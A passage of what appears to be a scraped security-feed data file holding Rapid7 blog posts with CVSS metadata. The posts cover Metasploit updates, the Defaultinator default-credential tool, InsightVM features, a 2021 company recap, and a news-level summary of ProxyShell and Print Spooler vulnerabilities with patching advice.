credential capture plugin that lets you configure all options from a single start/stop command, eliminating redundant work.\n\n****User interface (UI) optimization: ****URLs are commonly used to identify endpoints \u2014 particularly web applications \u2014 during attacker emulation. Until now, Metasploit required users to manually specify quite a few components when using URLs. The latest update to the Metasploit UI understands a URL's format, so users can copy and paste them from anywhere, even right from their browser.\n\n****Payloadless session capabilities: ****When emulating attacks, exploits typically generate Meterpreter payloads, making them easy to spot for many antivirus and EDR solutions \u2014 and reducing their effectiveness for security testing. Metasploit now lets you run post-exploitation actions and operations without needing a payload. You can tunnel modules through SSH sessions or create a WinRM session for any Metasploit module compatible with the shell session type, removing the need for a payload like reverse shell or Meterpreter.\n\n****SMB server support:**** Metasploit Version 6 included SMB 3 server support, but only for client modules, which was limiting for users who were working with modern Windows targets that had disabled SMB 3 client support. Now, SMB 3 is available in all SMB server modules, so you can target modern Windows environments and have them fetch (often payload) files from Metasploit. This means you don't need to install and configure an external service to test for certain types of vulnerabilities, including [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>).\n\n## Defaultinator: Find default credentials faster\n\nMetasploit is at the heart of Rapid7's commitment to open-source security, but we're not stopping there. In addition to continually improving Metasploit, our research team works on new open-source projects that help make security more accessible for all. The latest of those is Defaultinator, a new tool that Curt Barnard announced the release of in his Black Hat Arsenal talk this year. (Curt also joined our podcast, Security Nation, to preview the announcement \u2014 [check out that episode](<https://www.rapid7.com/blog/post/2022/08/03/security-nation-curt-barnard-on-defaultinator-black-hat-arsenal-preview/>) if you haven't yet!)\n\n[Defaultinator](<https://defaultinator.com/>) is an open-source tool for looking up default usernames and passwords, providing an easy-to-search data repository in which security pros can query these commonly used credentials to find and eliminate them from their environment. This capability is becoming increasingly important for security teams, for a few key reasons:\n\n * Some commonly used pieces of hardware in IT environments come with default credentials that could give attackers an easily exploitable method of network access. Curt gave the example of the Raspberry Pi microcontroller board, which always comes with the username \"pi\" and password \"raspberry\" for initial login \u2014 a security flaw that resulted in a [10 CVSS vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2021-38759>) published in 2021.\n * Meanwhile, IoT devices have been proliferating, and many of these manufacturers don't have security best practices at the front of their mind. That means hardcoded default credentials for first-time logins are common in this type of tool.\n * Many software engineers (Curt included) spend a lot of time in [Stack Overflow](<https://stackoverflow.com/>), and many of the code snippets found there contain example usernames and passwords. If you aren't careful when copying and pasting, default credentials could make their way into your production environment.\n\nWith a whopping 54 CVEs for hardcoded usernames and passwords released just in 2022 so far (by Curt's count), security pros are in need of a fast, accurate way to audit for default credentials. But until now, the tools for these kinds of audits just haven't been out there, let alone widely available.\n\nThat's why it was so important to make Defaultinator, the first tool of its kind for querying default usernames and passwords, an open-source solution \u2014 to ensure broad accessibility and help as many defenders as possible. Defaultinator offers an API search-based utility or a web-based user interface if you prefer not to interact with the API. It runs in Docker, and the quickstart repository on [Github](<https://github.com/defaultinator>) takes just four lines of code to get up and running.\n\nWatch the replays of Spencer's and Curt's presentations, as well as other great sessions from Black Hat 2022, at our [replay page](<https://www.rapid7.com/info/events-2022/post-blackhat-2022/>).\n\n_**Additional reading:**_\n\n * _[Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software](<https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/>)_\n * _[[VIDEO] An Inside Look at Black Hat 2022 From the Rapid7 Team](<https://www.rapid7.com/blog/post/2022/08/15/video-an-inside-look-at-black-hat-2022-from-the-rapid7-team/>)_\n * _[Collaboration Drives Secure Cloud Innovation: Insights From AWS re:Inforce](<https://www.rapid7.com/blog/post/2022/08/02/collaboration-drives-secure-cloud-innovation-insights-from-aws-re-inforce/>)_\n * _[Defending Against Tomorrow's Threats: Insights From RSAC 2022](<https://www.rapid7.com/blog/post/2022/06/13/defending-against-tomorrows-threats-insights-from-rsac-2022/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-19T14:25:08", "type": "rapid7blog", "title": "Pushing Open-Source Security Forward: Insights From Black Hat 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-38759"], "modified": "2022-08-19T14:25:08", "id": "RAPID7BLOG:D1C9D661B6FC47BE44B8FBB6E1D49AD5", "href": "https://blog.rapid7.com/2022/08/19/pushing-open-source-security-forward-insights-from-black-hat-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-08T15:44:47", "description": "![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/insightvm-q3.jpg)\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-1.png)\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the ****Export to PDF ****button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-2.png)\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:04:19", "description": "![Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors](https://blog.rapid7.com/content/images/2022/01/rapid7-2021-wrapup.jpg)\n\nNow that 2022 is fully underway, it's time to wrap up some of the milestones that Rapid7 achieved in 2021. We worked harder than ever last year to help protectors keep their organization's infrastructure secure \u2014 even in the face of [some of the most difficult threats](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) the security community has dealt with in recent memory. Here's a rundown of some of our biggest moments in that effort from 2021.\n\n## Emergent threats and vulnerability disclosures\n\nAs always, our Research and Emergent Threat Response teams spent countless hours this year tirelessly bringing you need-to-know information about the most impactful late-breaking security exploits and vulnerabilities. Let's revisit some of the highlights.\n\n### Emergent threat reports\n\n * [Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)\n * [CVE-2021-34527 (PrintNightmare): What You Need to Know](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\n * [GitLab Unauthenticated Remote Code Execution CVE-2021-22205 Exploited in the Wild](<https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n * [Microsoft SAM File Readability CVE-2021-36934: What You Need to Know](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>)\n\n### Vulnerability disclosures\n\n * [CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](<https://www.rapid7.com/blog/post/2021/09/07/cve-2021-3546-78-akkadian-console-server-vulnerabilities-fixed/>)\n * [Fortinet FortiWeb OS Command Injection](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>)\n * [CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>)\n\n## Research and policy highlights\n\nThat's not all our Research team was up to in 2021. They also churned out a wealth of content and resources weighing in on issues of industry-wide, national, and international importance.\n\n * We published several reports on the state of cybersecurity, including:\n * Our [2020 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2021/03/11/introducing-the-vulnerability-intelligence-report-50-cves-that-made-headlines-in-2020/>)\n * Our latest [Industry Cyber-Exposure Report (ICER)](<https://www.rapid7.com/blog/post/2021/05/05/rapid7-releases-new-industry-cyber-exposure-report-icer-asx-200/>)\n * Our [2021 Cloud Misconfigurations Report](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>)\n * We tackled the [hot-button topic of hack back](<https://www.rapid7.com/blog/post/2021/08/10/hack-back-is-still-wack/>) and discussed whether or not the practice is, in fact, wack. (Spoiler: It is.)\n * We unpacked the implications for [cybersecurity in the US Infrastructure Bill](<https://www.rapid7.com/blog/post/2021/08/31/cybersecurity-in-the-infrastructure-bill/>).\n * We highlighted the reasons why we think the [UK's Computer Misuse Act](<https://www.rapid7.com/blog/post/2021/08/12/reforming-the-uks-computer-misuse-act/>) needs some revising.\n * We launched [Project Doppler](<https://www.rapid7.com/research/project-doppler/>), a free tool for Rapid7 customers, developed by our Research team to help organizations get better insight into their public internet exposure.\n\n## The Rapid7 family keeps growing\n\nThroughout 2021, we made some strategic acquisitions to broaden the solutions we offer and help make the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>) the one-stop shop for your security program.\n\n * [We acquired IntSights](<https://www.rapid7.com/blog/post/2021/07/19/rapid7-acquires-intsights/>) to help organizations obtain holistic threat intelligence.\n * [We teamed up with open-source platform Velociraptor](<https://www.rapid7.com/blog/post/2021/04/21/rapid7-and-velociraptor-join-forces/>) to provide teams with better endpoint visibility.\n * [We brought Kubernetes security provider Alcide](<https://www.rapid7.com/blog/post/2021/02/01/rapid7-acquires-leading-kubernetes-security-provider-alcide/>) under the Rapid7 umbrella to add more robust cloud security capabilities to InsightCloudSec.\n\n## Industry accolades\n\nWe're always thrilled to get industry recognition for the work we do helping protectors secure their organizations \u2014 and we had a few big nods to celebrate in 2021.\n\n * Gartner once again [named us a Leader](<https://www.rapid7.com/blog/post/2021/08/23/rapid7-mdr-named-a-market-leader-again/>) in its Magic Quadrant for Managed Detection and Response (MDR).\n * We also earned recognition as a Strong Performer in the [inaugural Forrester Wave for MDR](<https://www.rapid7.com/blog/post/2021/03/24/rapid7-recognized-as-a-strong-performer-in-the-inaugural-forrester-wave-for-mdr-q1-2021/>).\n * InsightIDR was recognized by Gartner us as a [Leader in SIEM](<https://www.rapid7.com/blog/post/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/>) for the second time in a row.\n * For its 2021 Dynamic Application Security Testing (DAST) Magic Quadrant, Gartner [named us a Visionary](<https://www.rapid7.com/blog/post/2021/06/01/rapid7-named-a-visionary-in-2021-gartner-magic-quadrant-for-application-security-testing/>).\n\n## Keeping in touch\n\nClearly, we had a pretty busy 2021 \u2014 and we have even more planned for 2022. If you need the latest and greatest in security content to tide you over throughout the last few weeks of the year, we have a few ideas for you.\n\n * Listen to the [latest season of Security Nation](<https://www.rapid7.com/blog/series/security-nation/security-nation-season-4/>), our podcast where we chat with amazing guests from all corners of the security community. Season 5 launches later this month!\n * Put the finishing touches on your cybersecurity program for the coming year with insights from our [2022 Planning series](<https://www.rapid7.com/blog/tag/2022-planning/>).\n * Get better acquainted with the latest application security threats with our series on the [OWASP Top 10 for 2021](<https://www.rapid7.com/blog/tag/owasp-top-10-2021/>).\n * Read up on why [InsightIDR was XDR before it was cool to be XDR](<https://www.rapid7.com/blog/post/2021/11/09/insightidr-was-xdr-before-xdr-was-even-a-thing-an-origin-story/>).\n\nStay tuned for more great content, research, and much more in 2022!\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-01-05T18:52:41", "type": "rapid7blog", "title": "Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2021-1675", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-34527", "CVE-2021-3546", "CVE-2021-36934", "CVE-2021-44228"], "modified": "2022-01-05T18:52:41", "id": "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "href": "https://blog.rapid7.com/2022/01/05/rapid7-2021-wrap-up-highlights-from-a-year-of-empowering-the-protectors/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T01:34:04", "description": "![Popular Attack Surfaces, August 2021: What You Need to Know](https://blog.rapid7.com/content/images/2021/08/August-vulns.jpg)\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n![Popular Attack Surfaces, August 2021: What You Need to Know](https://blog.rapid7.com/content/images/2021/08/image.png)\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vu

Microsoft Warns: Another Unpatched PrintNightmare Zero-Day

Description

Related